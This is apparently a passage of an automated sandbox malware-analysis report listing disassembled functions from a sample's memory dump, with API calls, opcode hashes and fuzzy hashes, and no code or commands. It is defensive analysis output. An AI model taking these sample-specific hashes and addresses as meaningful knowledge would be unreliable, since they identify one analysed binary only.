                                                                                                                                                                                                Function 0015C2B7 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0015C2C1
                                                                                                                                                                                                  • Part of subcall function 0015C272: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0015C316,000000FF,00000000,0015C315,00000000,00000000,?,?,?,?,0015C316,?), ref: 0015C2A8
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharH_prolog3_MultiWide
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1474283020-0
                                                                                                                                                                                                • Opcode ID: 83b6a51f1dddba43a7920f3ed29e83ecdc9f76023a0ecb15c96c3aadf1f3a7c6
                                                                                                                                                                                                • Instruction ID: 64c949e5f41c1e8f3341ad23c05bb6f2061e991316501c483e50848b854725d0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 83b6a51f1dddba43a7920f3ed29e83ecdc9f76023a0ecb15c96c3aadf1f3a7c6
                                                                                                                                                                                                • Instruction Fuzzy Hash: C221C17294121DABCB24EBA0CC8AFCD7778AF24310F5141D5A618A7191EB70AF84CFD0
                                                                                                                                                                                                Function 00144B0C Relevance: 1.6, Strings: 1, Instructions: 315COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ,
                                                                                                                                                                                                • API String ID: 0-3772416878
                                                                                                                                                                                                • Opcode ID: 0690b5133393a9bd872750145171cae7d18c21fcab9e141bba17ff2a3ccce9ee
                                                                                                                                                                                                • Instruction ID: d55968e29d0103291da7a7a2a77fa65b57bcec854a512854c62e8880f2d5f7af
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0690b5133393a9bd872750145171cae7d18c21fcab9e141bba17ff2a3ccce9ee
                                                                                                                                                                                                • Instruction Fuzzy Hash: F0D17F71A0526A9FCB25CB688C407EDFBB0AF65300F1481EAD459B7742D7709E94CFA1
                                                                                                                                                                                                Function 00178EF2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
                                                                                                                                                                                                  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00179020,00000001), ref: 00178F64
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                                                                                • Opcode ID: 413837f54194b0ce1a4064ac6f6121af5ce9886d424a31425362f8ad3013b879
                                                                                                                                                                                                • Instruction ID: 318f80dd208cd02723d9dc2cacf7c7064ff860a162fc82dd0a933f3b657f50ec
                                                                                                                                                                                                • Opcode Fuzzy Hash: 413837f54194b0ce1a4064ac6f6121af5ce9886d424a31425362f8ad3013b879
                                                                                                                                                                                                • Instruction Fuzzy Hash: 301125372143019FDB18AF39C8956BAB7B2FF84328B18842DE94A87A40D771A942C740
                                                                                                                                                                                                Function 001794AF Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
                                                                                                                                                                                                  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0017923C,00000000,00000000,?), ref: 001794DB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3736152602-0
                                                                                                                                                                                                • Opcode ID: 22deb2ebb0b2186988e453b0ce9a8f010df511abdd8ac5e65da6e6bebe0c2544
                                                                                                                                                                                                • Instruction ID: d88094518977b91b3e25ce17d0b1a200ca5bbeb0325af80714f84615a30a093b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 22deb2ebb0b2186988e453b0ce9a8f010df511abdd8ac5e65da6e6bebe0c2544
                                                                                                                                                                                                • Instruction Fuzzy Hash: DF01F972A54122BBDB2C5A659C0AABB7779EB40754F15C42AFC0AE3580EB30FE45C790
                                                                                                                                                                                                Function 00178F8D Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
                                                                                                                                                                                                  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00179280,00000001), ref: 00178FD7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                                                                                • Opcode ID: 7bf36dbb750e8d6dbe68b782ff8659c7780398f1b27e9a1cada2ed495b421610
                                                                                                                                                                                                • Instruction ID: bc63d785768e7463f9b9bcb581ef7ddf5274075f123ba6539cd2e458b1c2d6be
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bf36dbb750e8d6dbe68b782ff8659c7780398f1b27e9a1cada2ed495b421610
                                                                                                                                                                                                • Instruction Fuzzy Hash: FCF046322403046FCB146F39DC89E7ABBA6EF81728B05C02DF9498BA80CB719D01C740
                                                                                                                                                                                                Function 00171B7D Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0016E991: EnterCriticalSection.KERNEL32(?,?,0016BDC5,00000000,001977E8,0000000C,0016BD8D,?,?,001702D4,?,?,00171547,00000001,00000364,?), ref: 0016E9A0
                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(Function_00031B70,00000001,00197AD8,0000000C,00171FA5,?), ref: 00171BB5
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1272433827-0
                                                                                                                                                                                                • Opcode ID: 55e1df8795ea81a569070c0a880df079ec34e97532fcede8f273a0db88f8c635
                                                                                                                                                                                                • Instruction ID: 31b09ce35cc04db9af110113ab348b6b3ec0d7a916654a8e04b0961ee76c8c04
                                                                                                                                                                                                • Opcode Fuzzy Hash: 55e1df8795ea81a569070c0a880df079ec34e97532fcede8f273a0db88f8c635
                                                                                                                                                                                                • Instruction Fuzzy Hash: 33F03776A44204EFDB10EF98E846B9C7BF0EB49721F00815AF414AB2A1DB7949448F40
                                                                                                                                                                                                Function 00178EA5 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
                                                                                                                                                                                                  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00178E00,00000001), ref: 00178EDE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                                                                                • Opcode ID: 4dd7328080e8d66594fdc5f15f02af8f6f33b72813260af188b2c5dd489f0760
                                                                                                                                                                                                • Instruction ID: 03d6b7dbba443ce27944dc0b8e5e18de564d675ea999ad81a1ca109ee3fb06ca
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4dd7328080e8d66594fdc5f15f02af8f6f33b72813260af188b2c5dd489f0760
                                                                                                                                                                                                • Instruction Fuzzy Hash: C7F0E53674020557DB149F39D84DA6ABFA4EFC1720B0A845DFA09CB691CB729943C790
                                                                                                                                                                                                Function 00178EA7 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
                                                                                                                                                                                                  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00178E00,00000001), ref: 00178EDE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                                                                                • Opcode ID: 8e9318440a6c633cdbe4da1b42948de8854e520be20d27081bddb2048a3c758c
                                                                                                                                                                                                • Instruction ID: 83165781d7d80d1a976522922475f24f79119c0d74cad4e6b675e877edf61f94
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9318440a6c633cdbe4da1b42948de8854e520be20d27081bddb2048a3c758c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 43F0E53674020557CB149F39D84DA6ABFA4EFC1720B0A845DFA09CB691CB729942C790
                                                                                                                                                                                                Function 001720A9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0016E467,?,20001004,00000000,00000002,?,?,0016DA59), ref: 001720DD
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                                                                                • Opcode ID: ef91104b56e673f56037ec0b519bac4e94d06fa3f1b1e7440812ffbba2d6cf54
                                                                                                                                                                                                • Instruction ID: db62b46c79e5c8d8f0c8f70472566e6e4d7425ea97e0ae7bac2175e7c4df7dda
                                                                                                                                                                                                • Opcode Fuzzy Hash: ef91104b56e673f56037ec0b519bac4e94d06fa3f1b1e7440812ffbba2d6cf54
                                                                                                                                                                                                • Instruction Fuzzy Hash: 82E04F31501218BBCF122FA0EC09AAE7F36EF44B51F048010FC0965222CB318E61ABA4
                                                                                                                                                                                                Function 0015D535 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001D550,0015D005), ref: 0015D53A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                • Opcode ID: e54280c40aad7b6484d0e3cd1e0c814d2da3eed47338c420ab208c0738a2632e
                                                                                                                                                                                                • Instruction ID: 724a6467a4c9f2607037c1776e158027bbfde303fed3ec032e617537993171a7
                                                                                                                                                                                                • Opcode Fuzzy Hash: e54280c40aad7b6484d0e3cd1e0c814d2da3eed47338c420ab208c0738a2632e
                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                Function 00145462 Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: PK
                                                                                                                                                                                                • API String ID: 0-443340723
                                                                                                                                                                                                • Opcode ID: 646e92a25ca17630ac919cb883073e65421af8de64d3cd611baff82bd22d5b9c
                                                                                                                                                                                                • Instruction ID: 72074af9b3dc3a30bc19a63b9fa173c6164065b181d2bce6e412150fa4211560
                                                                                                                                                                                                • Opcode Fuzzy Hash: 646e92a25ca17630ac919cb883073e65421af8de64d3cd611baff82bd22d5b9c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7391B371208B42EFD709CF28C840A6AFBA2FF55314F44461DF4A5876A2D730E969CBD6
                                                                                                                                                                                                Function 001537C6 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: i-8
                                                                                                                                                                                                • API String ID: 0-3871616529
                                                                                                                                                                                                • Opcode ID: e053eb542aeb4a6de5b8424594cc9e7dc13aeb8df60439d1d98f254186d395c6
                                                                                                                                                                                                • Instruction ID: ed9044c3e5d22265f9404dc7d371c9101d40ed022da828b10c4bcb04a24946f0
                                                                                                                                                                                                • Opcode Fuzzy Hash: e053eb542aeb4a6de5b8424594cc9e7dc13aeb8df60439d1d98f254186d395c6
                                                                                                                                                                                                • Instruction Fuzzy Hash: D1F096735011643B5B2CDE65DC56CBFB7ADDB89260706812EFC0AAB180CA20AC0081B4
                                                                                                                                                                                                Function 001423C8 Relevance: .5, Instructions: 456COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: c17f53fd1331c3cf45bdd04f6ff31c753c5db3d640a5395b3023557dff7aef63
                                                                                                                                                                                                • Instruction ID: 4923732862588c7b95983d0954f57018c6d8059a5553b5c3ee17da9490a643c9
                                                                                                                                                                                                • Opcode Fuzzy Hash: c17f53fd1331c3cf45bdd04f6ff31c753c5db3d640a5395b3023557dff7aef63
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A126974A10A22AFC719CF29C5905A8FBB1FF59310BA44229EA5687F51D335F8A1CFD0
                                                                                                                                                                                                Function 00141A8D Relevance: .5, Instructions: 453COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: c57a51d05784856d4c6b9f1aa7f7dd7787fe0f81c4f4ed946a41945fec95b2b6
                                                                                                                                                                                                • Instruction ID: 804be6ec7f0e59edda80821e67a68453f031d2dc7c9e9b420daf321695ddc6b1
                                                                                                                                                                                                • Opcode Fuzzy Hash: c57a51d05784856d4c6b9f1aa7f7dd7787fe0f81c4f4ed946a41945fec95b2b6
                                                                                                                                                                                                • Instruction Fuzzy Hash: EB12BE70A00B649FCB35CF29CC946AAB7F2BF95300F2448ADD59A57B62D731A985CF00
                                                                                                                                                                                                Function 001530A2 Relevance: .4, Instructions: 397COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 610e01b6890f6daa5765b7b373a3fa9b9fb77ed48dd0420f1a7c72bc73b9fbdb
                                                                                                                                                                                                • Instruction ID: 619c6885ed651d00bb3e03792f019c75fca7ef27293e553af0d0f7adb24a1225
                                                                                                                                                                                                • Opcode Fuzzy Hash: 610e01b6890f6daa5765b7b373a3fa9b9fb77ed48dd0420f1a7c72bc73b9fbdb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 58F11972E10609DFCF08CFA8D991AEDB7F2BF98350F248169D865A7344D734AA45CB60
                                                                                                                                                                                                Function 001428E2 Relevance: .4, Instructions: 369COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
